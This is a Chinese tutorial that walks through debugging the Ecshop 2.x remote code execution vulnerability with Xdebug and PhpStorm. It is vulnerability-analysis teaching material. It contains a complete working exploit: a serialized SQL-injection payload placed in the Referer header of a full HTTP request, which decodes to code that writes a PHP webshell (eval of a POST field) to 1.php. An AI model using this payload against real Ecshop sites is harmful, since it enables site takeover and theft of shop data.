如何进行Ecshop2.x代码执行漏洞动态调试分析

发布时间:2021-12-16 17:57:45 作者:柒染
来源:亿速云 阅读:153

如何进行Ecshop2.x代码执行漏洞动态调试分析,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

一、背景介绍

号称国内最大的开源网店系统,可以直接远程写入webshell。

本文会通过动态分析来解析漏洞每个细节,关于漏洞原理可以看漏洞原理,讲的很详细,本文重点介绍动态分析审计的技巧和如何调试漏洞,关于漏洞本身也是一个很值得学习的漏洞,能构造出这个攻击链是需要对每个细节都有深刻的认识才能实现的。

二、动态调试环境搭建

自行下载安装phpstudy和phpstorm

首先确定php版本

然后修改配置文件    

如何进行Ecshop2.x代码执行漏洞动态调试分析

修改php.ini中如下

[XDebug]

xdebug.profiler_append = 0xdebug.profiler_enable = 1xdebug.profiler_enable_trigger = 0xdebug.profiler_output_dir ="C:\phpStudy\tmp\xdebug"xdebug.trace_output_dir ="C:\phpStudy\tmp\xdebug"xdebug.profiler_output_name = "cache.out.%t-%s"xdebug.remote_enable = 1xdebug.remote_handler = "dbgp"xdebug.remote_host = "127.0.0.1"zend_extension="C:\phpStudy\php53\ext\xdebug.dll"xdebug.remote_port=9000xdebug.idekey= PHPSTROM

设置php版本,一定要对应上

如何进行Ecshop2.x代码执行漏洞动态调试分析

下面图片是默认的不用动

如何进行Ecshop2.x代码执行漏洞动态调试分析

下面的修改key和端口如下

如何进行Ecshop2.x代码执行漏洞动态调试分析

如何进行Ecshop2.x代码执行漏洞动态调试分析在这里配置根目录调试环境    
如何进行Ecshop2.x代码执行漏洞动态调试分析

如何进行Ecshop2.x代码执行漏洞动态调试分析

这里就留一个Chrome浏览器

如何进行Ecshop2.x代码执行漏洞动态调试分析

Chrome浏览器要安装插件JetBrains IDE Support 下载安装好了不用修改配置,这样就基本可以了。 

三、漏洞动态调试分析

下面进行动态分析,动态分析的好处就是漏洞分析起来更加清晰。

如何进行Ecshop2.x代码执行漏洞动态调试分析

下断点这里我们断到了漏洞起始点方便分析每一个细节,然后点击debug,

然后浏览器会打开

如何进行Ecshop2.x代码执行漏洞动态调试分析

然后点击登录,会触发断点,可以看到停到了断点处

如何进行Ecshop2.x代码执行漏洞动态调试分析

下面介绍使用的一些快捷键:

f7会跟进函数 ,

f8 步出也就是一行一行走,不进入函数,有些循环或者不想看的函数直接f8,

进入函数后想跳出去就用shift+f8

Ctrl+art加 点击想要看的函数就会进入

Alt +f7 会搜索谁调用了这个函数或者变量

笔者常用的就这些,掌握这些技能后就可以调试

这里HTTP_REFFER可控到赋值到$back_act

如何进行Ecshop2.x代码执行漏洞动态调试分析

我们先用burp抓包测试下漏洞 ,先分析下payload

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}

554fcae493e564ee0dc75bdf2ebf94caads 这串可以分解成两块,一个是554fcae493e564ee0dc75bdf2ebf94ca,一个是ads,ads是控制函数流程进入到insert_ads函数,554fcae493e564ee0dc75bdf2ebf94ca前面的这个就是个hash,后面会对它判断,判断后会把它去掉,没有它是进入不了攻击链的,后面再动态分析过程会介绍到。

后面的编码部分解开是这样

{$asd'];assert(base64_decode('file_put_contents('1.php','<?php eval($_POST[1337]); ?>')'));//}xxx

发包

GET /upload/user.php?act=login HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Cookie: ECS_ID=3e839434a217e8c1f2a931f70086935a43141a6d; ECS[visit_times]=1Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10--    -";s:2:"id";s:3:"'/*";}Connection: closeUpgrade-Insecure-Requests: 1

如何进行Ecshop2.x代码执行漏洞动态调试分析

可以看的成功写入webshell

如何进行Ecshop2.x代码执行漏洞动态调试分析

然后我们继续调试,我们先一路f8走到这里,然后再f7进入看看

如何进行Ecshop2.x代码执行漏洞动态调试分析

这里的关键点是insert_mod,动态调用,因为我们没办法抓包发送payload测试,所以这里面我们需要自己修改参数让流程按照payload攻击链来执行,攻击链中需要执行insert_ads,下面的有个hash判断

如何进行Ecshop2.x代码执行漏洞动态调试分析

下面的可以看到有这个hash,所以这里不需要控制,然后继续流程

如何进行Ecshop2.x代码执行漏洞动态调试分析如何进行Ecshop2.x代码执行漏洞动态调试分析

下面图片中会把hash去掉然后剩下$k,$k中的1,3,5,7都可以控制,所以这里我们在1修改它的值为我们的payload,右键点击setvalue

如何进行Ecshop2.x代码执行漏洞动态调试分析

把这payload重新复制,右键setValue,这里直接复制会报错,还是一点点修改吧,然后双引号要转义

ads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}

如何进行Ecshop2.x代码执行漏洞动态调试分析

继续f7进入到insert_mod里面,然后发现,insert_ads函数已经控制了,但是payload被反序列化时候$para为false,说明我们的payload有问题,点击debug重新来。

如何进行Ecshop2.x代码执行漏洞动态调试分析

换了个位置修改,在反序列化函数之前修改,下面图片可以看到$para有值了,是我们的payload

如何进行Ecshop2.x代码执行漏洞动态调试分析

继续走来到了insert_ads,一路f8,让我们的payload代入进了变量num

最后拼接成了这样

如何进行Ecshop2.x代码执行漏洞动态调试分析

继续往下走,一路f8来到这里

如何进行Ecshop2.x代码执行漏洞动态调试分析

然后f7进入看看,会把payload代入_eval代码执行函数,在这里payload还会被fetch_str处理,f7进入看看    

如何进行Ecshop2.x代码执行漏洞动态调试分析

F8来到这里,在这里之前source都没有变化,经过了preg_replace会处理掉{    

payload变成$asd’;]assertxxx 代入到了select里

这个select函数跟入不进去,只能静态分析下了,可以这样寻找ctrl+shift+f

如何进行Ecshop2.x代码执行漏洞动态调试分析

在select中进入了get_val,substr去掉了$

如何进行Ecshop2.x代码执行漏洞动态调试分析

Payload变成了:asd’;]assertXXX

进入到了make_var

如何进行Ecshop2.x代码执行漏洞动态调试分析

最后拼接到了

如何进行Ecshop2.x代码执行漏洞动态调试分析

最终payload变成

$this->_var['asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//']

最后来到eval    

如何进行Ecshop2.x代码执行漏洞动态调试分析

这里再走一下就把shell写进去了

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

推荐阅读:
  1. 任意代码执行漏洞
  2. Windows远程代码执行漏洞及Microsoft Excel远程代码执行漏洞的示例分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

上一篇:如何解析CSRF的攻击、防御与挖掘

下一篇:怎么解析Python中的Dict

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》